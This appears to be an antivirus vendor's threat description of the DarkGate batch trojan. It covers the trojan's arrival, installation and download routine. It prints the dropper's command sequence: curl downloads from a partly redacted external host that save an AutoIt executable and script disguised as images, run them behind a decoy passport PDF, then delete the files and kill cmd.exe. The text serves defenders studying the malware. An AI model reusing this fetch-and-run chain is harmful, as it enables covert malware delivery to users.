Trojan.BAT.DARKGATE.FV

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It may be dropped by other malware.

It deletes the initially executed copy of itself.

Arrival Details

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

It may be dropped by the following malware:

• Trojan.LNK.DARKGATE.FV

Installation

This Trojan adds the following processes:

• curl --silent -L {BLOCKED}medrbopdrv.com/boostrap/p.pdf -o %User Profile%/Downloads/Passport20231023_90223.pdf
• %User Profile%/Downloads/Passport20231023_90223.pdf
• curl --silent -L {BLOCKED}medrbopdrv.com/boostrap/a.png -o %User Temp%/AutoIt3.exe
• curl --silent -L {BLOCKED}medrbopdrv.com/boostrap/s.png -o %User Temp%/Orange.txt
• cd %tmp%
• AutoIt3.exe Orange.txt
• del Orange.txt
• del AutoIt3.exe
• del Taste.cmd
• taskkill /f /im cmd.exe

Other System Modifications

This Trojan deletes the following files:

• After execution:
  • %User Temp%/AutoIt3.exe
  • %User Temp%/Orange.txt

(Note: %User Temp% is the current user's Temp folder, which is usually C:\Documents and Settings\{user name}\Local Settings\Temp on Windows 2000(32-bit), XP, and Server 2003(32-bit), or C:\Users\{user name}\AppData\Local\Temp on Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit).)

Download Routine

This Trojan connects to the following URL(s) to download its component file(s):

• {BLOCKED}medrbopdrv.com/boostrap/p.pdf
  It saves the file as:
  • %User Profile%/Downloads/Passport20231023_90223.pdf → serves as a decoy pdf file
  
  
• {BLOCKED}medrbopdrv.com/boostrap/a.png
  It saves the file as:
  • %User Temp%/AutoIt3.exe
  
  
• {BLOCKED}medrbopdrv.com/boostrap/s.png
  It saves the file as:
  • %User Temp%/Orange.txt → detected as TrojanSpy.AutoIt.DARKGATE.FV

Other Details

This Trojan deletes the initially executed copy of itself.